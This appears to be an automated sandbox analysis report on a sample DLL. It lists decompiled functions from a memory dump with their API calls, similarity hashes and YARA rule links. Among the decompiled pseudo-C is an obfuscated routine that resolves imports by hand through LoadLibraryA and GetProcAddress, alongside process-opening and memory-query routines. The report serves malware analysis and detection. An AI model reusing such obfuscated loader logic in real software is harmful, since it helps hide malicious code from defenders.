Function 6E1DF679, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF712
GetLocaleInfoW.KERNEL32(?,20001004,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF73B
GetACP.KERNEL32(?,?,6E1DF997,?,00000000), ref: 6E1DF750

Strings

ACP, xrefs: 6E1DF697
OCP, xrefs: 6E1DF6CD

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction ID: cce3889d74054d3dde4e500e9e911cf9744d65b122a1351814f7a9dfa2310df5
Opcode Fuzzy Hash: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction Fuzzy Hash: 7D21C432A54101AAE7608FE5C944AC773B6EF68B60B728414E935D7218E732DFC5E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DEECF, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

GetACP.KERNEL32(?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E1DEF90
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?), ref: 6E1DEFBB
_wcschr.LIBVCRUNTIME ref: 6E1DF04F
_wcschr.LIBVCRUNTIME ref: 6E1DF05D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1DF11E

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: a9efe12d38f729ee6cf2a641c510ec0bba6a5bc7963a2eb31b1903f59f4bc452
Instruction ID: fcc2f03058cd77943056eb03dccd44505359c51f4753464fde7a78b7267f4403
Opcode Fuzzy Hash: a9efe12d38f729ee6cf2a641c510ec0bba6a5bc7963a2eb31b1903f59f4bc452
Instruction Fuzzy Hash: 3F711A32A10206AAE714DFF5CC45AEBB3BCEF58705F204469E525D7180EB71EAC8E761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF84E, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7AB
Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1DF95A
IsValidCodePage.KERNEL32(00000000), ref: 6E1DF9A3
IsValidLocale.KERNEL32(?,00000001), ref: 6E1DF9B2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1DF9FA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1DFA19

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 14b873b596f7f4f6ab4860575478a30056eae2239245cdc0ec7319b0eb090925
Instruction ID: 8909db9d014c77ecd0a065871c5c95f97eba3c3e4ab4e7b99410db9c056447bc
Opcode Fuzzy Hash: 14b873b596f7f4f6ab4860575478a30056eae2239245cdc0ec7319b0eb090925
Instruction Fuzzy Hash: 85515E71D0060AAAEF44DFE5CC44AAE77B9AF19704F204429A921EB150E7709A89EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E161850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x6e164130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e16413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x6e16412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e164128 = _t5;
						 *0x6e164130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e164124 = _t6;
						if(_t6 == 0) {
							 *0x6e164124 =  *0x6e164124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e161851
0x6e16185f
0x6e161867
0x6e16186c
0x6e1618be
0x6e1618be
0x6e16186e
0x6e161876
0x6e16187e
0x6e16187e
0x6e1618ba
0x6e1618bc
0x00000000
0x00000000
0x00000000
0x6e161878
0x6e16187a
0x6e161880
0x6e161880
0x6e161885
0x6e161893
0x6e161898
0x6e16189e
0x6e1618a6
0x6e1618ab
0x6e1618ad
0x6e1618ad
0x6e1618b7
0x6e16187c
0x6e16187c
0x00000000
0x6e16187c
0x6e16187a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E16164B,74B063F0), ref: 6E16185F
GetVersion.KERNEL32 ref: 6E16186E
GetCurrentProcessId.KERNEL32 ref: 6E161885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E16189E

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 3df187235d91e544a5295fddc5c543bba03251bd51208823a1a7d7a0d80f2e5e
Instruction ID: c1acf36d23d190c8b0fc631c75b192a67c15ccf32a1271a8e389209536e27402
Opcode Fuzzy Hash: 3df187235d91e544a5295fddc5c543bba03251bd51208823a1a7d7a0d80f2e5e
Instruction Fuzzy Hash: 05F0AF70754A209AEFC19FA8A8297B93BB8F757712F20C255E548C61C4D37090CBBB18

Uniqueness

Uniqueness Score: -1.00%

Function 6E161745, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e16414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e161745
0x6e16174e
0x6e161753
0x6e161759
0x6e161762
0x6e161768
0x6e16176a
0x6e16176d
0x6e161772
0x6e161779
0x6e161779
0x6e16177d
0x6e161785
0x6e161788
0x00000000
0x00000000
0x6e16178e
0x6e161798
0x6e16179a
0x6e16179d
0x6e1617a0
0x6e1617a4
0x6e1617ac
0x6e1617ae
0x6e1617b1
0x6e161819
0x6e161819
0x6e16181d
0x00000000
0x00000000
0x6e1617b6
0x6e1617bc
0x6e1617be
0x6e1617d1
0x6e1617d4
0x6e1617d4
0x6e1617d4
0x6e1617d8
0x6e1617c0
0x6e1617c0
0x6e1617c8
0x6e1617ca
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1617ca
0x6e1617b8
0x6e1617b8
0x6e1617cc
0x6e1617cc
0x6e1617cc
0x6e1617db
0x6e1617de
0x6e1617e0
0x6e1617e7
0x6e1617e2
0x6e1617e2
0x6e1617e2
0x6e1617ef
0x6e1617f5
0x6e1617f7
0x6e161827
0x6e1617f9
0x6e1617f9
0x6e1617fc
0x6e1617fe
0x6e161806
0x6e161806
0x6e16180b
0x6e16180d
0x6e161814
0x6e161816
0x6e161816
0x6e161816
0x00000000
0x6e161816
0x00000000
0x6e1617f7
0x6e1617a6
0x6e1617a8
0x6e1617aa
0x00000000
0x00000000
0x6e1617aa
0x6e16182a
0x6e16182a
0x6e161831
0x6e161836
0x00000000
0x00000000
0x6e16183c
0x6e161847
0x00000000
0x6e161847
0x6e16183e
0x6e16183e
0x6e161844
0x00000000
0x6e161844
0x6e161772
0x6e161848
0x6e16184d

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E16177D
GetProcAddress.KERNEL32(?,00000000), ref: 6E1617EF

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: e48c943d885e4de5fa96864c7cd7e58d838035dc99495b9c257a5ff9de609106
Instruction ID: 81442adbe5fc4ed76058d0060282d6a67066f368b437dba934e55c944a4d26d2
Opcode Fuzzy Hash: e48c943d885e4de5fa96864c7cd7e58d838035dc99495b9c257a5ff9de609106
Instruction Fuzzy Hash: 2F313E75F0020A9FDB44CF99C890AADB7F8FF15301B2540A9D819DB240E770DA99EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E162375, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E162375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e164178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1641c0 = 1;
										__eflags =  *0x6e1641c0;
										if( *0x6e1641c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e164178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1641c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e164178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e164180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e16417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1641c0 = 1;
							__eflags =  *0x6e1641c0;
							if( *0x6e1641c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1641c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e164180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e164178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e16237f
0x6e162382
0x6e162388
0x6e1623a6
0x00000000
0x6e1623a6
0x6e162390
0x6e162399
0x6e16239f
0x6e1623ae
0x6e1623b1
0x6e1623b4
0x6e1623be
0x6e1623be
0x6e1623c0
0x6e1623c3
0x6e1623c5
0x6e1623c5
0x6e1623c7
0x6e1623ca
0x00000000
0x00000000
0x6e1623cc
0x6e1623ce
0x6e162434
0x6e162434
0x6e162592
0x00000000
0x6e162592
0x6e1623d0
0x6e1623d0
0x6e1623d4
0x6e1623d6
0x6e1623d6
0x6e1623d6
0x6e1623d6
0x6e1623d9
0x6e1623da
0x6e1623dd
0x6e1623dd
0x6e1623e1
0x6e1623e5
0x6e1623f3
0x6e1623f3
0x6e1623fb
0x6e162401
0x6e162403
0x6e162405
0x6e162415
0x6e162422
0x6e162426
0x6e16242b
0x6e16242d
0x6e1624ab
0x6e1624ab
0x6e16242f
0x6e16242f
0x6e16242f
0x6e1624ad
0x6e1624af
0x6e162590
0x6e162590
0x00000000
0x6e1624b5
0x6e1624b5
0x6e1624bc
0x00000000
0x00000000
0x6e1624c2
0x6e1624c6
0x6e162522
0x6e162524
0x6e16252c
0x6e16252e
0x6e162530
0x00000000
0x00000000
0x6e162532
0x6e162538
0x6e16253a
0x6e16253c
0x6e162551
0x6e162551
0x6e162553
0x6e162582
0x6e162589
0x00000000
0x6e162589
0x6e162557
0x6e162558
0x6e16255a
0x6e16255c
0x6e16255c
0x6e16255e
0x6e162560
0x6e162562
0x6e162576
0x6e162576
0x6e162579
0x6e16257b
0x6e16257b
0x6e16257c
0x6e16257c
0x00000000
0x6e162564
0x6e162564
0x6e162564
0x6e16256d
0x6e16256e
0x6e162570
0x6e162572
0x6e162572
0x00000000
0x6e162564
0x6e162562
0x6e16253e
0x6e162545
0x6e162545
0x6e162547
0x00000000
0x00000000
0x6e162549
0x6e16254a
0x6e16254d
0x6e16254f
0x00000000
0x00000000
0x00000000
0x6e16254f
0x00000000
0x6e162545
0x6e1624c8
0x6e1624cb
0x6e1624d0
0x00000000
0x00000000
0x6e1624d9
0x6e1624db
0x6e1624e1
0x00000000
0x00000000
0x6e1624e7
0x6e1624ed
0x00000000
0x00000000
0x6e1624f3
0x6e1624f5
0x6e1624fe
0x6e162502
0x00000000
0x00000000
0x6e162508
0x6e16250b
0x6e16250d
0x00000000
0x00000000
0x6e162514
0x6e162516
0x00000000
0x00000000
0x6e162518
0x6e16251c
0x00000000
0x00000000
0x00000000
0x6e16251c
0x00000000
0x00000000
0x00000000
0x6e162407
0x6e162407
0x6e162407
0x6e16240e
0x00000000
0x00000000
0x6e162410
0x6e162411
0x6e162413
0x00000000
0x00000000
0x00000000
0x6e162413
0x6e16243b
0x6e16243d
0x00000000
0x00000000
0x6e16244d
0x6e16244f
0x6e162451
0x00000000
0x00000000
0x6e162457
0x6e16245e
0x6e16248a
0x6e16248a
0x6e16248c
0x6e16248e
0x6e1624a2
0x6e1624a4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e162490
0x6e162490
0x6e162490
0x6e162499
0x6e16249a
0x6e16249c
0x6e16249e
0x6e16249e
0x00000000
0x6e162490
0x6e162460
0x6e162463
0x6e162465
0x6e162477
0x6e162477
0x6e16247a
0x6e16247c
0x6e16247c
0x6e16247d
0x6e16247d
0x6e162483
0x00000000
0x00000000
0x00000000
0x00000000
0x6e162467
0x6e162467
0x6e162467
0x6e16246e
0x00000000
0x00000000
0x6e162470
0x6e162470
0x6e162471
0x00000000
0x00000000
0x00000000
0x6e162471
0x6e162473
0x6e162475
0x6e162488
0x00000000
0x00000000
0x00000000
0x6e162488
0x00000000
0x6e162475
0x6e1623e7
0x6e1623ea
0x6e1623ed
0x00000000
0x00000000
0x6e1623ef
0x6e1623f1
0x00000000
0x00000000
0x00000000
0x6e1623f1
0x6e1623b6
0x6e1623b8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E162426

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: a117a7921c1ec66c18a160242208dac3b58cf964dc964e575aa7791a3aec8574
Instruction ID: 2ea3ade8badf2f8f9091a32243f8630363af9b135a51995340fb95afa1b4afde
Opcode Fuzzy Hash: a117a7921c1ec66c18a160242208dac3b58cf964dc964e575aa7791a3aec8574
Instruction Fuzzy Hash: 9961E670B14606CFD769CFA9C4B06A937B5FBAA358B318429D815C7294F770D8E2E640

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A72B0, Relevance: 28.8, APIs: 19, Instructions: 287COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A72B7

Part of subcall function 6E183233: __EH_prolog3_GS.LIBCMT ref: 6E18323A

__Getcoll.LIBCPMT ref: 6E1A7306
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A731A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A732F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A736D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7380
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73C6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73FA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7457
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74B5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74C8
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74E5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7502
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A751F
numpunct.LIBCPMT ref: 6E1A755E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A756E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75B2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75C5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75E2

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollH_prolog3H_prolog3_numpunct
String ID:
API String ID: 1787807339-0
Opcode ID: a8803060f3d3b45dedde8940ba510f5309266091370e387b2cc7e8a9b24b2a5a
Instruction ID: 84ae787f9ff0a5ff380b8b51d200b6eba5664968edfdeba59b2c63ad47966137
Opcode Fuzzy Hash: a8803060f3d3b45dedde8940ba510f5309266091370e387b2cc7e8a9b24b2a5a
Instruction Fuzzy Hash: CA91EAB5D04311ABD710DBF98851AFF7BACEF41254F11486DED18BB280DB318AD4B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD508, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E1DD54C

Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD842
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD854
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD866
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD878
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD88A
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD89C
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8AE
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8C0
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8D2
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8E4
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8F6
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD908
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD91A

_free.LIBCMT ref: 6E1DD541

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DD563
_free.LIBCMT ref: 6E1DD578
_free.LIBCMT ref: 6E1DD583
_free.LIBCMT ref: 6E1DD5A5
_free.LIBCMT ref: 6E1DD5B8
_free.LIBCMT ref: 6E1DD5C6
